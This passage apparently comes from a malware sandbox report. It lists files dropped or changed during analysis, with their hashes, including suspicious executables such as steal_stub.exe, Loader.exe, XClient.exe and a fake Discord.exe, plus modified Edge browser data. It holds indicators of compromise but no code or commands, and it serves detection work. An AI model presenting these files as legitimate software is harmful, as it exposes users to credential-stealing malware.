| SHA512 | b85f1b2328a9bb83ee20af89a90881fc26c305252dd35da771aecce645d6ebedde6cf3015487ae0a012ea156425214e2befef0a1c5c769d31f754b6329c15568 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe
| MD5 | 230f75b72d5021a921637929a63cfd79 |
| SHA1 | 71af2ee3489d49914f7c7fa4e16e8398e97e0fc8 |
| SHA256 | a5011c165dbd8459396a3b4f901c7faa668e95e395fb12d7c967c34c0d974355 |
| SHA512 | 3dc11aac2231daf30871d30f43eba3eadf14f3b003dd1f81466cde021b0b59d38c5e9a320e6705b4f5a0eeebf93f9ee5459173e20de2ab3ae3f3e9988819f001 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | a94fc4e30dc7b5eeb42bfad6d7fe671e |
| SHA1 | c51a865e8b8314fee574fed6c2fb005568e3c348 |
| SHA256 | 45820e720a137578aff4f0397ab73d6c9bb8c71eac6dea8124c1f9b8de31db3e |
| SHA512 | d716402f8ea496291fb25bcba6d49dc4bc4ca6eba4aa50587c0997c94b02323ab087592acebc4013e915aafa12a0b3284309c40214dbb9c70be2159600115235 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\qwex.exe
| MD5 | 6217bdb87132daca22cb3a9a7224b766 |
| SHA1 | be9b950b53a8af1b3d537494b0411f663e21ee51 |
| SHA256 | 49433ad89756ef7d6c091b37770b7bd3d187f5b6f5deb0c0fbcf9ee2b9e13b2e |
| SHA512 | 80de596b533656956ec3cda1da0b3ce36c0aa5d19b49b3fce5c854061672cf63ad543daaf9cf6a29a9c8e8b543c3630aab2aaea0dba6bf4f9c0d8214b7fadbe6 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\XW.exe
| MD5 | db69b881c533823b0a6cc3457dae6394 |
| SHA1 | 4b9532efa31c638bcce20cdd2e965ad80f98d87b |
| SHA256 | 362d1d060b612cb88ec9a1835f9651b5eff1ef1179711892385c2ab44d826969 |
| SHA512 | b9fe75ac47c1aa2c0ba49d648598346a26828e7aa9f572d6aebece94d8d3654d82309af54173278be27f78d4b58db1c3d001cb50596900dee63f4fb9988fb6df |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe
| MD5 | 4d58df8719d488378f0b6462b39d3c63 |
| SHA1 | 4cbbf0942aeb81cc7d0861d3df5c9990c0c0c118 |
| SHA256 | ecf528593210cf58333743a790294e67535d3499994823d79a1c8d4fa40ec88d |
| SHA512 | 73a5fea0cf66636f1f7e1cf966a7d054e01162c6e8f1fc95626872d9e66ea00018a15a1b5615f5398c15316e50bf40336c124c7320b1d66893c1edb16c36b738 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe
| MD5 | 2a4ccc3271d73fc4e17d21257ca9ee53 |
| SHA1 | 931b0016cb82a0eb0fd390ac33bada4e646abae3 |
| SHA256 | 5332f713bef3ab58d7546f2b58e6eaf55c3e30969e15b6085a77e7fd9e7b65b4 |
| SHA512 | 00d6728fa5c2692dab96107187126a44e09976f0d26875f340b3ad0d3f202abb4fbc5426f2934096087ef6e404bc1dc21b6e6ebbacba172c383d57bdef185a74 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\piotjhjadkaw.exe
| MD5 | eaef085a8ffd487d1fd11ca17734fb34 |
| SHA1 | 9354de652245f93cddc2ae7cc548ad9a23027efa |
| SHA256 | 1e2731a499887de305b1878e2ad6b780ff90e89bc9be255ae2f4c6fa56f5cf35 |
| SHA512 | bfda0cb7297d71ad6bf74ec8783e279547740036dd9f42f15640d8700216cdd859b83cc720e9f3889a8743671b4d625774f87e0d1768f46d018fccaf4dbef20e |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\krgawdtyjawd.exe
| MD5 | d4a8ad6479e437edc9771c114a1dc3ac |
| SHA1 | 6e6970fdcefd428dfe7fbd08c3923f69e21e7105 |
| SHA256 | a018a52ca34bf027ae3ef6b4121ec5d79853f84253e3fad161c36459f566ac2b |
| SHA512 | de181dc79ca4c52ce8de3abc767fbb8b4fd6904d278fa310eee4a66056161c0b9960ef7bebf2ebf6a9d19b653190895e5d1df92c314ca04af748351d6fb53e07 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\jdrgsotrti.exe
| MD5 | aeb9f8515554be0c7136e03045ee30ac |
| SHA1 | 377be750381a4d9bda2208e392c6978ea3baf177 |
| SHA256 | 7f671b0f622d94aebf0c6ab2f021b18e1c60beda819bc48c0b2c6a8f5fdd7e02 |
| SHA512 | d0cfc09d01bd42e0e42564f99332030ed2ff20624bfd83a3f1bb3682fe004e90d89539f5868bba637287795e2668dd14409e2e0ed2ea1c6982c7ce11db727bb4 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisteruop.exe
| MD5 | aa7c3909bcc04a969a1605522b581a49 |
| SHA1 | e6b0be06c7a8eb57fc578c40369f06360e9d70c9 |
| SHA256 | 19fcd2a83cd54c9b1c9bd9f8f6f7792e7132156b09a8180ce1da2fe6e2eeaaab |
| SHA512 | f06b7e9efe312a659fd047c80df637dba7938035b3fd5f03f4443047f4324af9234c28309b0b927b70834d15d06f0d8e8a78ba6bd7a6db62c375df3974ce8bd0 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe
| MD5 | 3ba1890c7f004d7699a0822586f396a7 |
| SHA1 | f33b0cb0b9ad3675928f4b8988672dd25f79b7a8 |
| SHA256 | 5243e946c367c740d571141cdbc008339559c517efaf3061475a1eced7afaed2 |
| SHA512 | 66da498ce0136c20c9a6af10c477d01b2fe4c96fe48bb658996e78c249f3e88dc1fda2f60f78106a0b967de4c95698b2cb9983d1a599e67753223d915116189d |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe
| MD5 | aa002f082380ecd12dedf0c0190081e1 |
| SHA1 | a2e34bc5223abec43d9c8cff74643de5b15a4d5c |
| SHA256 | f5626994c08eff435ab529331b58a140cd0eb780acd4ffe175e7edd70a0bf63c |
| SHA512 | 7062de1f87b9a70ed4b57b7f0fa1d0be80f20248b59ef5dec97badc006c7f41bcd5f42ca45d2eac31f62f192773ed2ca3bdb8d17ccedea91c6f2d7d45f887692 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | e74c10c023d5284d659311b0e1d436fc |
| SHA1 | 1b54f87b122ed448900e51eed8af3552886862fc |
| SHA256 | 5f08de2235cb8c22fcbdb231a9f62d66c127507993617b14309d3fcae8626cf9 |
| SHA512 | 94e67bed314ae9ad21658b187f0d666b37d0d9cecb588183db927fcc85fcf9685987bed16232f98f15c53f0b579cc3b79e9d33b124b32ebd04e1237b5a155778 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\ScreenUpdateSync.exe
| MD5 | 27754b6abff5ca6e4b1183526f9517dd |
| SHA1 | d4bf3590c3fb7e344dfbce4208f43c0ebf34df81 |
| SHA256 | a2082d5f5b17e3e06dbd6c87272da65f704845511cd48cc56d5083297c3af901 |
| SHA512 | 01ab9d2d8678be99b7b8dd14de232005d1722c7bc0040c3b5cb8d9fef7654c3ab44a8b7b166884b45a9193daa1aa6d463f3dbbc6998d84ef6ca7b54f4397b587 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe
| MD5 | 1f8e9fec647700b21d45e6cda97c39b7 |
| SHA1 | 037288ee51553f84498ae4873c357d367d1a3667 |
| SHA256 | 9c110c0426f4e75f4384a527f0abe2232fe71f2968eb91278b16b200537d3161 |
| SHA512 | 42f6ca3456951f3e85024444e513f424add6eda9f4807bf84c91dc8ccb623be6a8e83dc40a8b6a1bc2c6fd080f2c51b719ead1422e9d1c1079795ec70953a1ad |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6ea1ece2a7a1062a98103a5a7563306d |
| SHA1 | ce249a1f82b76e9ae54ef5296b3606cbf9201fc7 |
| SHA256 | 6708f333e97d002b03fe531f16aeec6dcd7fae83441f6c80febe61a31b5a9ece |
| SHA512 | 6de6b22e821a33574b8c4c2f027283a721a109063602afd56b78a73ab9f1a947f508935e79973263e0f3fcc0f794c7981a46345002198eae5cc882569a5aa3db |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe
| MD5 | 21a8a7bf07bbe1928e5346324c530802 |
| SHA1 | d802d5cdd2ab7db6843c32a73e8b3b785594aada |
| SHA256 | dada298d188a98d90c74fbe8ea52b2824e41fbb341824c90078d33df32a25f3d |
| SHA512 | 1d05f474018fa7219c6a4235e087e8b72f2ed63f45ea28061a4ec63574e046f1e22508c017a0e8b69a393c4b70dfc789e6ddb0bf9aea5753fe83edc758d8a15f |
C:\Users\Admin\AppData\Local\Temp\opsktB6r8XrRPpB
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\test30.exe
| MD5 | e9289cac82968862715653ae5eb5d2a4 |
| SHA1 | 9f335c67384fc1c575fc02f959ce1f521507e6e1 |
| SHA256 | e2f0800a6b674891005a97942ff0cf8ab7082c2ecfc072d5c29cd87ecb1f09f6 |
| SHA512 | 81135caacfddd75979a22af40b9fa97653add7f94bb6bf8649a4c1494ed041cbe42eb8b2335a21099421bf02ed4ce589052800b7c8ab5d7a27e3329e8d7427fe |
C:\Users\Admin\AppData\Local\Temp\dEMxeIpNz4uAjdg
| MD5 | a182561a527f929489bf4b8f74f65cd7 |
| SHA1 | 8cd6866594759711ea1836e86a5b7ca64ee8911f |
| SHA256 | 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914 |
| SHA512 | 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\76f29b4d-deb0-4fb7-9510-defc8075ca56.dmp
| MD5 | c22dd9725d50299a93bc063a7fccb768 |
| SHA1 | 983f6ec9f0ff2a3cc63c30c5ab3679f5363522a9 |
| SHA256 | 91d823a59ab203e037912b66e50a85446679b737d10442fe6b767c2c6534e699 |
| SHA512 | c7670c45afad9e72ce6b02f4f2c3af0a78d719db4208ee4f6b5b1e35679b825e56a5121ad37f38547d5d38ddd6d7114b4d79c4ca14f3ac3caf84fa8575833b56 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 4d0942e51b937ed6a0b3764858036466 |
| SHA1 | 22184b64093323b3e98e8c0799c3b6a0e47b796b |
| SHA256 | 57e619b09bb4280ac41fdff8d82fd60a0c15739ca892f7897d5d8df672e75f75 |
| SHA512 | 25c1295de51ff963133ecab733e1a335c147cc27344568fdf341d5b90d87666926f184c8877128c16e9d74c78dc0903af89e5596d87db24a512555a797510f6f |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\testingfile.exe
| MD5 | 4489c3282400ad9e96ea5ca7c28e6369 |
| SHA1 | 91a2016778cce0e880636d236efca38cf0a7713d |
| SHA256 | cc68b1903e22d22e6f0a29bcdf46825d5c57747d8eb3a75672a4d6930f60fe77 |
| SHA512 | adaeab8aa666057ff008e86f96ae6b9a36ff2f276fdd49f6663c300357f3dc10f59fac7700bb385aa35887918a830e18bddaa41b3305d913566f58aa428a72b0 |
C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe
| MD5 | b697ce9b8a52e980c56fcc0ea9e2d317 |
| SHA1 | c3499e95f9ea491a849fb0166a51bcdbd993755f |
| SHA256 | 267a96dfceb0a3a3d3cfd38b2ffc5e4a46444cfcbb6c630f6a09afe9bbf89ca7 |
| SHA512 | 67519da65dfe5ecffb2baa67a8a00eb353f1a36400f270ee8caae84d5a3b67b48d92266218bdcb4688dbfd7a82e42a390f953682bc4b4bd4eb4100b8b84c434f |
C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\unins000.exe
| MD5 | 23f60823928b4763e4a4b00c2f95a95e |
| SHA1 | 564dc386bfc94b161e0e83e144431e81d9f18cc9 |
| SHA256 | 1dcb5cee14b78a95c9e0ebec1f14795e8aaa838810a59d823327e0825b1e32f9 |
| SHA512 | 22154db81d9391b982951fabb9da6776bc4209ae9c7d93825222ac0e5a776e0accfe6b2400af6d29d9f2cee8fa30cef074065079a65d66cdbece07a3dd3c48cd |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Discord.exe
| MD5 | bedd5e5f44b78c79f93e29dc184cfa3d |
| SHA1 | 11e7e692b9a6b475f8561f283b2dd59c3cd19bfd |
| SHA256 | e423c72ea1a279e367f4f0a3dc7d703c67f6d09009ed9d58f9c73dac35d0a85c |
| SHA512 | 3a7924196830b52d4525b897f45feb52ec2aca6cd20437b38437f171424450fd25692bd4c67ccde2cf147f0ed6efcef395ea0e13b24f0cf606214b58cf8284de |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 32cc6dd31c565a302eddcc55b7bdb1fe |
| SHA1 | 128f396cdf79adc2b32d28612721119ede1cac42 |
| SHA256 | 28a5bac140ef0fb95c6d6bd856d9b3ef4e93f69eb46a8895cadbbe6ea6e452be |
| SHA512 | 79afe8850a689c94def54ca1658e00ca43c8186c741c99b9cb19d89ef7048d687f84964d677c75640b4e0f624b5b359d97edc7c25a7ab435c47ce7d1a8ce0df9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 6ce78b8bf60d835e99f48c9ba3f3d801 |
| SHA1 | 5125af2f2f442849911df2018429dbea37acef01 |
| SHA256 | 5a0648782bea662cd068c78990621e7a65224c7c81d95d3bee1511b442ad7983 |
| SHA512 | 8403b0aa4da524dd481d0ef35d0d2bb129c16042ce3432d2eb8b1df413b725284e87e22d22d5ceb9c1a14cd146a1211edd4d08907d20eed920018f5cec03253f |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\RuntimeBroker.exe
| MD5 | 7ae9e9867e301a3fdd47d217b335d30f |
| SHA1 | d8c62d8d73aeee1cbc714245f7a9a39fcfb80760 |
| SHA256 | 932cb7b1080180487be4b5754bd92600409bafda80d412018a792a8930c6a46c |
| SHA512 | 063648705e1817a1df82c9a595e4bbe8e0b1dbb7e31a6517df59905ebe7f22160f4acb55349d03dfe70744a14fd53c59a4c657c7a96646fcccf1c2214fc803dd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 847e1d089d43095765f43c68d0e1acc2 |
| SHA1 | 4446c49f6237c314b3531a9d44c2019d861457a3 |
| SHA256 | 4d36ba9a89f2f62e3b32239ee437c3238cc3478c627814b5bbe055117bb9013f |
| SHA512 | fa04d1688e5e199f77ba3609d9407abae3f9599257cf58a42dbf5701717b5e0c38a3faa1a8a020e414b6ed66f51eff5ffa0ff024a8d5b5916a697457e42cd7ae |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Loader.exe
| MD5 | e9a138d8c5ab2cccc8bf9976f66d30c8 |
| SHA1 | e996894168f0d4e852162d1290250dfa986310f8 |
| SHA256 | e63b41bfdd3a89b6ebcfc05db158fdc399dbc081e49b01498831a62df34defc3 |
| SHA512 | 5982fc759c8b1121ab5befaac53e1521931f06d276140195fa1fcbcd1069f546253e366ef4cc37245b3bc2ed60c4b8d0583f133a1264efd77938adf456a08ccc |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\SigniantApp_Installer_1.5.1806.exe
| MD5 | 2a34f21f31584e1f50501503fddf1ddd |
| SHA1 | 16e3daa24bcea193afb0bb39e2eace8875d59da6 |
| SHA256 | 3dece3e441fcc172dddbac40f56c0fba0b53e2ae718045987998c622764aff84 |
| SHA512 | 916b235a14c78d7eea193e2de5ca313d35f3d144c12646d8328faa57f2e1547c888260eb93b228e427bad0a1c688f99bb98f1dd0a5e8428c5aa2b1d11ea612e5 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\wmfdist.exe
| MD5 | 6e05e7d536b34f171ed70e4353d553c2 |
| SHA1 | 333750aa2d2121ad3e332ada651add83170b7bf8 |
| SHA256 | fd0754a2ef3567859db0bf3c75f18ec50aaeae6a7561aff9e7f6c7775a945ed7 |
| SHA512 | 148be9744466f83ae89650fa461132266300cea8b08c793a320416f4a71a19fd3caf2e9258664040fcc44c06c77eb84bd5a7d1c47839d147c8ed5b5bee69610f |
C:\Users\Admin\Desktop\Files\steal_stub.exe
| MD5 | 551b5647d3a1aa7d8601ca7ec0c3214b |
| SHA1 | 6c8d5bde9d5b0066259a0b64608869fd158eace8 |
| SHA256 | 8f160c23bb9cac1cebf70f6897814bcfae6064cb9776966fd408800d27730f68 |
| SHA512 | 036b7f81d57d7114b85d5cef8e8c86ef7b313ac6acc92138db275fd75c54ef2c36fa0177377b40f069dd81b2faa5d7a0652bfe819b47f6f5d7a9433133819525 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe
| MD5 | 732746a9415c27e9c017ac948875cfcb |
| SHA1 | 95d5e92135a8a530814439bd3abf4f5cc13891f4 |
| SHA256 | e2b3f3c0255e77045f606f538d314f14278b97fd5a6df02b0b152327db1d0ff6 |
| SHA512 | 1bf9591a04484ed1dab7becb31cd2143c7f08b5667c9774d7249dbd92cf29a98b4cabfa5c6215d933c99dc92835012803a6011245daa14379b66a113670fbb08 |
C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe
| MD5 | e21a937337ce24864bb9ca1b866c4b6e |
| SHA1 | 3fdfacb32c866f5684bceaab35cea6725f76182f |
| SHA256 | 55db20b6ddab0de6b84f4200fbde54b719709d7c50f0bdd808369dbb73deef70 |
| SHA512 | 9fb59ecc82984dcc854a31ae2e871f88fd679a162ee912eb92879576397fa29eddc2ec2787f7645aa72c4dc641456980f6b897302650f0d10466dea50506f533 |
C:\Users\Admin\Desktop\Files\seksiak.exe
| MD5 | 239c5f964b458a0a935a4b42d74bcbda |
| SHA1 | 7a037d3bd8817adf6e58734b08e807a84083f0ce |
| SHA256 | 7809ab9c004fbd18f185c7b54554440d7b31f201980aee6e0c62a97c0e4a984c |
| SHA512 | 2e9e95d5097ce751d2a641a8fc7f8bc824a525a07bc06cd8a60580405fad90543ffa3259e6b2b2e97a70a3c3ed03e73b29f7cb9ebd10e7c62eaef2078805be19 |
C:\Users\Admin\Desktop\Files\file.exe
| MD5 | 70f7fdd57cd561a114ac03e1f50649fe |
| SHA1 | efdda56c5ee07ce3cd2acf51e5655d786d828e90 |
| SHA256 | 9f08561de1eb32642a366d27532450c7908d1f1fadd1667fdf49187b584f5e69 |
| SHA512 | 113db0056db03700027b46db11f83b0c763af10798c643c1ade655f3f8ad51b2e8afbc2a7db3133082a1c3b35bf2a236985517029eff137fb449d3e6c93a4448 |
C:\Windows\Fonts\pssystem-regular.ttf
| MD5 | 1a39fca2c69a994d826c1cc86e3cfd81 |
| SHA1 | eab8d282c6312b4d978ec2a6aa0f9ecfcd3b3b53 |
| SHA256 | b8370566e165bbe48c32291fc1d56e861234dc898134c0fda82ae59fb9209619 |
| SHA512 | 1710774184ea54df3bfb490ac1c3a6028ab7e1fc3170cb3f321415b27f2068acecada116522b92cd9cf2c240bcf73902e6c39baed389461a82f426866f3c4c56 |
C:\Program Files (x86)\金瑞行情交易系统\Config.xml
| MD5 | b08164b951003995c94bd755b06607ea |
| SHA1 | c5c15846f098f41efd7d4bc05034111b961a3741 |
| SHA256 | 4ec5c976a5338973623bc50648fcbea8e711f9461a6b782f6c25b0e74e6dd25f |
| SHA512 | 6bf003d44286b2e5408e7cbf02186831c1c3d2ac1510a38924d784f2b322094d81932b212a99d246ddd535f480389bd443f8a8651e076280de72835b2f1a5c3e |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\leto.exe
| MD5 | a0507bfe0c6732252a9482eb0dd4eb0c |
| SHA1 | af318e66c86daf48a5dc8511a5e2a0c870edd05d |
| SHA256 | c3ee04588440b04a39dd6a603e91492f9f52fb20c7a43dcdc606b227742a097e |
| SHA512 | 4e4f699aa5cdca9d296bc6f3e3d9ef824430bbaa14db27aeb973f7bf576900fc5ca33946034475bfe696bac026cab14f0addf93018e7099a1b04ebc3a75a2c97 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\dxwebsetup.exe
| MD5 | 2cbd6ad183914a0c554f0739069e77d7 |
| SHA1 | 7bf35f2afca666078db35ca95130beb2e3782212 |
| SHA256 | 2cf71d098c608c56e07f4655855a886c3102553f648df88458df616b26fd612f |
| SHA512 | ff1af2d2a883865f2412dddcd68006d1907a719fe833319c833f897c93ee750bac494c0991170dc1cf726b3f0406707daa361d06568cd610eeb4ed1d9c0fbb10 |
C:\Windows\SysWOW64\directx\websetup\dsetup32.dll
| MD5 | a5412a144f63d639b47fcc1ba68cb029 |
| SHA1 | 81bd5f1c99b22c0266f3f59959dfb4ea023be47e |
| SHA256 | 8a011da043a4b81e2b3d41a332e0ff23a65d546bd7636e8bc74885e8746927d6 |
| SHA512 | 2679a4cb690e8d709cb5e57b59315d22f69f91efa6c4ee841943751c882b0c0457fd4a3376ac3832c757c6dfaffb7d844909c5665b86a95339af586097ee0405 |
C:\Windows\Logs\DirectX.log
| MD5 | 06a917b03a47c660b370c7c25851d8d6 |
| SHA1 | c620eda393633969c5c36f9885d7c3bfe028359a |
| SHA256 | 81ffd97cfa4a26058be92575200bc367c4b3d46bae49fc5b5435c337bdacbdb1 |
| SHA512 | 0c4d61e77d03a532861cdf8a9ce93229d51341c63e04cc3a7f3db670a66a487b16aaca26f5d077c69bcdbb837730b6d8b1ad9b98d5a93765d10f639a9f5242c1 |
C:\Windows\SysWOW64\directx\websetup\dsetup.dll
| MD5 | 984cad22fa542a08c5d22941b888d8dc |
| SHA1 | 3e3522e7f3af329f2235b0f0850d664d5377b3cd |
| SHA256 | 57bc22850bb8e0bcc511a9b54cd3da18eec61f3088940c07d63b9b74e7fe2308 |
| SHA512 | 8ef171218b331f0591a4b2a5e68dcbae98f5891518ce877f1d8d1769c59c0f4ddae43cc43da6606975078f889c832f0666484db9e047782e7a0ae4a2d41f5bef |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\fcxcx.exe
| MD5 | f0aaf1b673a9316c4b899ccc4e12d33e |
| SHA1 | 294b9c038264d052b3c1c6c80e8f1b109590cf36 |
| SHA256 | fcc616ecbe31fadf9c30a9baedde66d2ce7ff10c369979fe9c4f8c5f1bff3fc2 |
| SHA512 | 97d149658e9e7a576dfb095d5f6d8956cb185d35f07dd8e769b3b957f92260b5de727eb2685522923d15cd70c16c596aa6354452ac851b985ab44407734b6f21 |
C:\Users\Admin\AppData\Local\Temp\xi0.0
| MD5 | 6e11de74eb4b1464abb85c431d07d6e4 |
| SHA1 | 2d7f8d66b56524f923129b9aec247785d956cadc |
| SHA256 | 6226d1cf1bc139c479c39e4d1447e9d49e6e3965192e992f2fa956b44cc3992a |
| SHA512 | adcea57001d171c9aa734db0b2d8f06374130b3ec51d6aca6d1bfa9f944ff73f83af825e172970fd9903772ba55d8eae72aaeda2f28b7ce14a1b4dc0419cda0b |
C:\Users\Admin\AppData\Local\Temp\xi0.2
| MD5 | 49693267e0adbcd119f9f5e02adf3a80 |
| SHA1 | 3ba3d7f89b8ad195ca82c92737e960e1f2b349df |
| SHA256 | d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f |
| SHA512 | b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Itaxyhi.exe
| MD5 | 78c586522f986994aa77c466c9d678a8 |
| SHA1 | 4b9b13c3782ae532a140a33ba673dc65a37aa882 |
| SHA256 | 498ac6b747691eb456fc24ac26c3932effca9b46e39740963120f711e72aefc9 |
| SHA512 | 707ff5fcbb5e473583bec2d54aac25a3febe262c06025c9d88ddd5d30449b1454289eaa63bec848ca69147232474731052bef710e60c042d0c80e9c02486b5bb |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\XClient.exe
| MD5 | 015a5ef479c8d3e296e6a99e0fa7df6a |
| SHA1 | 69f188973fdc12d282e490041d18b01c0d49752d |
| SHA256 | c73ff8630476795ba4dde19e7763d1aae50978b0b9b029cd71828a2da3c2197c |
| SHA512 | 4c692aaff1607cf402ed7acc2f91f587229bfface6f75ae8329e031d69437f43291b186e9ca4bcdea595145ea50f3e23d064306e9a8d83a8848cf9096146e46a |
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
| MD5 | 7229bce5ce94ad8c3efdac6116ca0dfd |
| SHA1 | bab536edb7b176deedc34f51bca00786358a9238 |
| SHA256 | 786cacdf01a6f995fa366ec96f869e36aea02b478426595de4d72ce297b92312 |
| SHA512 | 147165e60b94781f32180d41107d81504cf6c8a08a7b235c0680af1708447341ab6cb42e4d8ba310b4425d30bb4961f91da1801f45285f32974ccd9f5a419f4b |
C:\Windows\SysWOW64\directx\websetup\filelist.dat
| MD5 | d6f81567baaf05b557d9bc6c348cb5f1 |
| SHA1 | 0c840165fcd34d996c85b6b44b00c7206bf772b6 |
| SHA256 | e60413bec64775bf1933ef4f9673c8bcfbe0ce71e950fd589bbd14c0f9a00359 |
| SHA512 | 09b84cc9199592821d7de38cbe24332097b276bb25b6d09f7dcdc3a6b17369ee944a6f8120f13ea6a5c15eb759a90d7ce29cc845a5c0680ff2fa53e2623171e2 |
C:\Windows\Logs\DirectX.log
| MD5 | ce597b8e496441f1619e27b099ee37d9 |
| SHA1 | 9c6a6307532fded30fa8b34cc2a71e4441ff29b1 |
| SHA256 | 10b96f4d0eca24a78ab25c673398302c707b5c4e066f64de6a0bbbb7346779af |
| SHA512 | 3424d3404125ab230de0bf1129a8ea2202b163f747f7071bdc49d36827901cb0eb3f90daf44c9b900e82ca931ed34dbcbf33bfa74681dc6810f3a662a8cf6340 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
| MD5 | 155585937b35b5b002ff63a3d3a57b11 |
| SHA1 | aff332adafbc54290e0e46dc667c0e272fae50bf |
| SHA256 | d66c91a6f7d49ea81e9221cb2044bdbf83322a3335afb657d0dee5f3642aec58 |
| SHA512 | 6704bd2c5f31412148e36ac709d1deea54eae86da7ca6e2995794d9b63d3bad904305319bb21c10f31721c5984ef379279ee42c7cd4baefc1d70667ae35bdd59 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0
| MD5 | 66a27a4b13412ca4f692ee390dbebf6e |
| SHA1 | 1b1469d7c96d8e8c800d3b6d895f54ff65bacd4f |
| SHA256 | 0ae0c9dec0878a376c16bfb4415a13d8376da48768310e2c7b8c7300a86d173a |
| SHA512 | eb57db164000a6af1d9e88e272e47c56c4dc70449687f0f4269299d8c384666cf25b133a2ff6b239728f359cc6cda40ea6f524ac676fa78cb618d82b86292679 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3
| MD5 | 5d65ec95a75848b5a76305c801fe1f1b |
| SHA1 | 4c7d4e1429d0bd60cd38f7420aa725c7197bc794 |
| SHA256 | 78b4660d33ff9bdbdb52aa02cdf597e6807fc5b8afd9b652d97da56e653e5770 |
| SHA512 | b4dd637ee8aef8430f3793181b1e1faa4fbed1105e1e56e996c4aeb96c2196397136366f10df0ac90a8e165092ccf0dc7b3487317c87af579982b2147a374a99 |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\laz.exe
| MD5 | 0a3457f3fb0d5c837200b2849e85b206 |
| SHA1 | 851c4add14eabb3b549666d2494ddcc4ebaf40b9 |
| SHA256 | aaeb0f22d9625f23135bc86f9ed7d5a877153732b9f24d3e416fe9fc7e532080 |
| SHA512 | 9610c9e53770f451b9d686d39b4475fed85ef443db663d1a4945aca19f940a9f24cda9907fabecb27304e5b4f52c8b13cf00d8385e55a1edbb3eebaf78ab7cbd |
C:\Users\Admin\AppData\Local\Temp\Tmp9B81.tmp
| MD5 | ad95327b91f1b8419cde22e2a65b05ff |
| SHA1 | b82308548e2d0da7869264f283d32f08fd7b8316 |
| SHA256 | ac1ec56834e5a94449e7f6e9f741b8878160250c6a0a70fac7170fb3815da2eb |
| SHA512 | 88924ee58cf0753f88403110cef3716dd252832685141885f583f525cc6d479efd079e2a97eb2351e2bd1a39429d5aca875643834b72daccdae3710959311533 |
C:\Users\Admin\AppData\Local\Temp\TmpA23A.tmp
| MD5 | 1d984bca2b41832d2ccb0ff8fa5c7f7d |
| SHA1 | 0df086f2da2af99074bd6edc3f29be3fcf71b425 |
| SHA256 | 5688d3c64966f573e0d1175603d5de08e9a2e26d8e850022dab4b1344d9e1188 |
